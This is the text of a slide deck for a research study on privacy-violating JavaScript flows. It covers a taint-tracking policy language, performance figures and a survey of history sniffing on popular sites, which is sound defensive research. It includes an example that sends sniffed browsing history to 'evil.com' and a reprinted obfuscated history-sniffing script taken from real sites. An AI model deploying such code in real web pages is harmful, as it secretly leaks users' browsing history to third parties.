An Empirical Study of Privacy-Violating Information Flows In JavaScript Web Applications
Dongseok Jang, Ranjit Jhala, Sorin Lerner, Hovav Shacham (UC San Diego)
✗ Phishing: Location Hijacking via document.location
✗ Identity Theft: Cookie Stealing via document.cookie
✗ History Sniffing: JavaScript can tell Visited links from Not-Visited ones
✗ Behavior Tracking
How Prevalent Are Malicious Flows? • How to Detect Malicious Flows?
Motivation Flow Policies Dynamic Flow Tracking Flows in the Wild Conclusions
Flow Policies • Specify different types of flows
Policies: History Sniffing • 1. Create (invisible) link to a.com (its color depends on history) • 2. Inspect the link's color style property (the color says whether the link was visited) • 3. Send sniffed info over the network
Policies: History Sniffing
  link = createLink("facebook.com");
  style = doc.getStyle(link);
  visited = style.color == "purple";
  send("evil.com", "facebook=" + visited);
• Inject taints at confidential sources: doc.getStyle(link)
• Propagate taints at assignments, etc.: style, visited, style.color == "purple", the argument of send(...)
• Block taints at untrusted sinks: send("evil.com", "facebook=" + visited)
Flow Policies
• Inject: at doc.getStyle($1) if isLink($1) inject "secret" (taint style with "secret")
• Block: at send($1, $2) block "secret" on $2 (block tainted values to third parties)
• General form: at Site if Cond inject Taint; at Site block Taint on Param
Flow Policies • Expressive • History Sniffing • Behavior Tracking • Cookie Stealing • Location Hijacking…
Motivation Flow Policies Dynamic Flow Tracking Flows in the Wild Conclusions
[Chander et al POPL 07] Dynamic Flow Tracking
• Source code → Parse → AST → Rewrite → AST → Execute (Dynamic Eval)
• Rewrite JS code to carry taints
• Rewritten code: add .taint fields; inject, propagate, block taints
• Rewriting issues: boxing / unboxing; indirect flows
• Implemented in Chrome/V8
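As an added illustration (not the paper's implementation), here is the history-sniffing policy from the preceding slides run through a miniature of the boxed-value rewriting: every value carries a .taint set, "secret" is injected at doc.getStyle on links, propagated through operations and a branch select (the indirect-flow case), and blocked at a third-party send. The DOM, browsing history and host names are constructed stubs.

```javascript
// Added example, not the paper's implementation: a miniature of the slide's
// inject / propagate / block scheme. Values are boxed with a .taint set (the
// "boxing" the rewriting step adds); taints are injected at sources, propagated
// through operations and branch conditions (indirect flows), and blocked at
// third-party network sinks. The DOM and history below are constructed stubs.
const FIRST_PARTY = "site.example";                   // assumed first-party host
const box = (v, taint = []) => ({ v, taint: new Set(taint) });

// Propagation: an operation's result carries both operands' taints.
function op(f, a, b) { return box(f(a.v, b.v), [...a.taint, ...b.taint]); }
// Indirect flow: `if (c) x = t; else x = e;` is rewritten as a select whose
// result carries the condition's taint on both paths, so a secret that only
// decides *which* branch ran is still tracked (simplifying assumption).
function select(c, t, e) {
  const chosen = c.v ? t : e;
  return box(chosen.v, [...c.taint, ...chosen.taint]);
}

const HISTORY = new Set(["facebook.com"]);           // constructed history
const doc = {
  createLink: (url) => box({ href: url, isLink: true }),
  createDiv: () => box({ isLink: false }),
  // Policy: at doc.getStyle($1) if isLink($1) inject "secret"
  getStyle: (el) => box({ color: HISTORY.has(el.v.href) ? "purple" : "blue" },
                        el.v.isLink ? ["secret"] : []),
};
const log = { sent: [], blocked: [] };
// Policy: at send($1, $2) block "secret" on $2, for third-party hosts only.
function send(host, payload) {
  const entry = { host: host.v, payload: payload.v };
  if (host.v !== FIRST_PARTY && payload.taint.has("secret")) {
    log.blocked.push(entry);
    return false;
  }
  log.sent.push(entry);
  return true;
}

// The sniffing flow from the slide, written against the boxed runtime.
function sniff(el, host) {
  const style = doc.getStyle(el);                                    // inject
  const visited = op((s, p) => s.color === p, style, box("purple")); // propagate
  const h = select(visited, box(true), box(false));                  // indirect
  return send(box(host), op((a, b) => a + b, box("facebook="), h));  // block
}
```

Note that a not-visited link is blocked as well: the "false" it would send is still derived from the link's style, which the select keeps tainted.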
Dynamic Flow Tracking • Performance (Overhead)
Performance: Policies • Cookie Confidentiality: cookie doesn't flow to 3rd-party code • Location Integrity: location is unaffected by 3rd-party code
Performance: Benchmark • 10 sites with the largest JS code base in the Alexa top 100 • 15–31 KLOC (avg. 21 KLOC)
Performance: Figures • Timing Overheads • Page load (avg: 2x) • JS execution (avg: 3x)
Performance: Upshot • High for online use • Acceptable for offline survey
Motivation Flow Policies Dynamic Flow Tracking Flows in the Wild Conclusions
Flows “In the Wild” • History Sniffing • Behavior Tracking
History Sniffing: Figures • Alexa Top 50,000 sites • 63 sites reported as sending history over network • 1 site in Alexa Top 100 • 46 sites were real cases
History Sniffing: Example
  var k = {0:"qpsoivc/dpn", 1:"sfeuvcf/dpn", 2:"bevmugsjfoegfs/dpn", ...};
  var g = [];
  for (var m in k) {
    var d = k[m];
    var a = "";
    for (f = 0; f < d.length; f++)
      a += String.fromCharCode(d.charCodeAt(f) - 1);
    var h = false;
    for (var j in { "http://": "", "http://www.": "" }) {
      var l = document.createElement("a");
      l.href = j + a;
      document.getElementById("ol").appendChild(l);
      var e = document.getComputedStyle(l).getPropertyValue("color");
      if (e == "rgb(12, 34, 56)" || e == "rgb(12,34,56)") { h = true }
    }
    if (h) { g.push(m) }
  }
• Encrypted URLs (the table k) • Decrypt URL (shift each character code by −1) • Create Link • Inspect Color • 1 site in Alexa Top 100
History Sniffing: Real Cases • charter.net • doubleclick.net • interclick • gamestorrents • harrenmedianetwork • meaningtool
History Sniffing: Upshot • # of sniffed URLs: 8 to 222 • Of the 46 real cases: 39 had third-party sniffing code, 7 had home-grown code • Obfuscated sniffing code • Code was generated at runtime
Malicious Flows "In the Wild" • History Sniffing • Behavior Tracking
Behavior Tracking • Log user behavior by JS event handlers • Send log back to website
Behavior Tracking: Policy
  // Browser event loop (model)
  while (1) {
    e = getEvent();
    if (e.isMouseOver()) onMouseOver(e);
    if (e.isClick()) onClick(e);
    ...
  }
  onMouseOver = function(event) { isMouseOver = true; }
• The assignment isMouseOver = true depends on the test e.isMouseOver() (an indirect flow)
• Policy: at $1.isMouseOver() inject "secret" • at $1.isClick() inject "secret" • …